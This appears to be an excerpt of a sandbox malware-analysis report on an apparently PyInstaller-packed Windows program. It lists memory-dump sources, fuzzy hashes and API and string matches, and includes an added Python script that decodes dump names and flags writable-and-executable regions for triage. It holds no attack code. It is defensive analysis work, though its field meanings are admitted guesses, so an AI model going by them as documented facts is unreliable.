                                                                                                                                                                                                                                  • Instruction ID: c4a12d63d9c9e1749a6b0f7ed45af4343cb6e5eddea43c0770adb01e305bf7a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2619E32908BC585EB31AF15E8403AAB7A1FB957E8F544225EB9C03B99DF7DD090CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                  • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction ID: 48c74187229be5f65c86340b6f42d7d27ce04f4ff2c29b7c0277e5e36e681679
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A4326082428AEB65AB21D94427CB792FF64BE4FA44135DB4C43BC6CF3DE450CB56
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007F6570
                                                                                                                                                                                                                                  • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                  • API String ID: 118773457-87138338
                                                                                                                                                                                                                                  • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                  • Instruction ID: d7a16e34eeaa8fe24f153d8dbe075dd92e105d838e28e21600838a6dd6b4e54c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3641C5B2B0A642C6E7229B25E4842696B51EB90794F544230EF5947EF9DF3CE5068F40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007A6164
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                  • API String ID: 2890651461-1778748169
                                                                                                                                                                                                                                  • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                  • Instruction ID: 2a913265f873bb001c7c1028b0ea939e71ada15abaaf031b4ec98a8a521fbde5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C4194E5E1BA83D4FEA39F71D49037822A2AF51F88F194634DE1D4B789CF2CA8518310
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF72C65352C,?,00000000,00007FF72C653F23), ref: 00007FF72C657F32
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                  • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                  • Instruction ID: 3ab870406fbb125b25def75207c35beec4136f729361646222f73b7df737d243
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC31E921729AC145EA32AB10EC103AAA256FF94BF0F900630EB6D437C9DE2CD205CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: ComputerErrorLastName
• String ID: socket.gethostname
• API String ID: 3560734967-2650736202
• Opcode ID: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
• Instruction ID: 514bcb732f33c75593ab8443702302d79d34c7a8deacfdfe5c0ab9b1cfcefea6
• Opcode Fuzzy Hash: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
• Instruction Fuzzy Hash: 2A3121A5B0E642C2F6268B31E8D427E63ADFF89B95F440075ED4E42765DF3DE0268620
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: inet_ntop
• String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
• API String ID: 448242623-2822559286
• Opcode ID: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
• Instruction ID: 121af9d5ad79ef54ad1d3e37c0994d36d2ce1f0489c061aa85d03bdc1970b15d
• Opcode Fuzzy Hash: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
• Instruction Fuzzy Hash: 45311CA1A1E983C1FA628B34E8D46BD2368FF84B44F500471ED4E83675DF2DE46A8761
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: getsockopt
• String ID: getsockopt buflen out of range$ii|i:getsockopt
• API String ID: 3272894102-2750947780
• Opcode ID: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
• Instruction ID: 24ea6b1481d077c655b0aa536ddd69d64b3e57bf30ccc5278e7969774aac167c
• Opcode Fuzzy Hash: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
• Instruction Fuzzy Hash: 42310AB2A1AA46C7EB158F34E4C056E73A8FB84B44F600179FA4E42764DF3DD46ACB50
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction ID: efc2cc75949c28834838293192019e9b07c730c3f009e7eae94369211073c948
• Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction Fuzzy Hash: 2E21F332708B4192E711AB54F8453EAB3A1FB98790F800136EA8D53659DF3CD259CB50
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: gethostbyname
• String ID: et:gethostbyname_ex$idna$socket.gethostbyname
• API String ID: 930432418-574663143
• Opcode ID: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
• Instruction ID: f5e9d5a376c2f645ccf1f14efd89d1a6079768f8f7a2d66662487130bd58e3e7
• Opcode Fuzzy Hash: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
• Instruction Fuzzy Hash: 842165A170AA82C1FA518B72E4C47AE6368FB88BC4F440176EE4D43B55CF3DD516C760
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: inet_pton
• String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
• API String ID: 1350483568-903159468
• Opcode ID: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
• Instruction ID: 09f0c2191dd6815491ebe0b435c05dfd3c88388275d2758085b6ba9f03c1c9ba
• Opcode Fuzzy Hash: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
• Instruction Fuzzy Hash: 4F2130A1A1E942D1FA629F34E4C017D2369FF84B94F900471FD4E826B5DF2DE52AC720
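The dump file names listed in these entries follow a dotted layout that the report does not explain. The following Python is an added example, not Joe Sandbox code, that parses the names appearing in this section and decodes the two fields whose observed values line up with Windows constants: the fifth field only ever takes winnt.h PAGE_* values here (0x02 PAGE_READONLY, 0x04 PAGE_READWRITE, 0x20 PAGE_EXECUTE_READ, 0x40 PAGE_EXECUTE_READWRITE, 0x80 PAGE_EXECUTE_WRITECOPY), and the seventh is 0x01000000 (MEM_IMAGE) on every dump the report marks "based on PE: true". That interpretation of the fields, the treatment of the last field as a per-module index (the dumps sharing one "Offset:" module base all share it), and every function name are assumptions of this example; the other fields are kept as raw strings. The check it performs is the one a triager wants from such a listing: which dumped image regions are writable and executable at the same time.

```python
"""Decode Joe Sandbox *.sdmp dump names and flag writable+executable image regions.

Added example; field meanings are an ASSUMPTION inferred from observed values
(field 5 matches winnt.h PAGE_* constants, field 7 matches MEM_IMAGE). Fields
1, 2, 3, 6 and 8 are not decoded and are kept as raw strings.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# winnt.h memory protection constants (low byte) and modifier bits
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
_EXEC = {0x10, 0x20, 0x40, 0x80}
_WRITE = {0x04, 0x08, 0x40, 0x80}

_H = "[0-9A-Fa-f]"
_NAME_RE = re.compile(
    rf"^(?P<pid>{_H}{{8}})\.(?P<stage>{_H}{{8}})\.(?P<snap>\d+)\.(?P<base>{_H}{{16}})\."
    rf"(?P<protect>{_H}{{8}})\.(?P<f6>{_H}{{8}})\.(?P<mtype>{_H}{{8}})\.(?P<f8>{_H}{{8}})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: str        # raw field 1 (assumed to be the process identifier)
    stage: str      # raw field 2
    snapshot: str   # raw field 3
    base: int       # field 4: virtual address of the dumped region
    protect: int    # field 5: decoded as a PAGE_* protection value (assumption)
    field6: str     # raw, meaning unknown
    mem_type: int   # field 7: decoded as MEMORY_BASIC_INFORMATION.Type (assumption)
    field8: str     # raw; appears to index the module (assumption)


def parse_dump_name(name: str) -> DumpRegion:
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(m["pid"], m["stage"], m["snap"], int(m["base"], 16),
                      int(m["protect"], 16), m["f6"], int(m["mtype"], 16), m["f8"])


def describe_protect(protect: int) -> str:
    """Render a protection value as winnt.h names, modifier bits appended with '|'."""
    base = protect & 0xFF
    parts = [PAGE_PROTECT.get(base, f"0x{base:02X}")]
    parts += [name for bit, name in PAGE_MODIFIERS.items() if protect & bit]
    return "|".join(parts)


def is_writable_executable(protect: int) -> bool:
    base = protect & 0xFF
    return base in _EXEC and base in _WRITE


def find_wx_image_regions(names):
    """(base, protection) of MEM_IMAGE dumps that are both writable and executable.

    A normally mapped PE has PAGE_EXECUTE_READ code and PAGE_READWRITE data; W+X
    image pages are where to look for in-place unpacking or runtime patching.
    """
    hits = [(r.base, describe_protect(r.protect)) for r in map(parse_dump_name, names)
            if MEM_TYPE.get(r.mem_type) == "MEM_IMAGE" and is_writable_executable(r.protect)]
    return sorted(hits)


def layout_by_module(names):
    """Group dumps by (pid, field8) and list (base, protection) in address order."""
    groups = defaultdict(list)
    for r in map(parse_dump_name, names):
        groups[(r.pid, r.field8)].append((r.base, describe_protect(r.protect)))
    return {key: sorted(regions) for key, regions in groups.items()}


# Sample input: the dump names that appear in this section of the report.
SAMPLE_DUMPS = [
    "00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp",
    "00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp",
    "00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp",
    "00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp",
    "00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp",
    "00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp",
    "00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp",
]

if __name__ == "__main__":
    for (pid, idx), regions in layout_by_module(SAMPLE_DUMPS).items():
        print(f"pid {pid}, module index {idx}:")
        for base, prot in regions:
            print(f"  {base:016X}  {prot}")
    print("W+X image regions:", [f"{b:X} {p}" for b, p in find_wx_image_regions(SAMPLE_DUMPS)])
```

Run against the names from this section, the module at 00007FF72C650000 shows the protections a cleanly mapped PE is expected to have (read-only headers, PAGE_EXECUTE_READ code, PAGE_READWRITE data), while every code-range dump of the module at 00007FFBAA490000 is PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. The example does not say why that is; it only points at which dumps to open first.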
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                  • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction ID: 8b524a3827706a60c711ccd8df38208960b7ce08d737fe9669f057a6b4006148
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17D10672B08E8199E712DF65C8402AC77B3FB647A8B944239DE5E97B85DE3CD006CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D07C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D107
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                  • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction ID: dad23c8e41addc558e5eaa13b3d2361447927d0d7230b50109a2f48c02d4c527
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0791D632E1865195F752AF669C4027DBBB2FB647A8FA4413DDE0E53684CE3CD442CB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                                                  • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction ID: e798a9ff5af1f77481553a2b50c57e67a3fc125e8c1208f250ac492d15c85b07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251F472F042118AFB15EB749D556BCB7A2FB64378FA00239DD1E52AE5DB3DA4028B10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
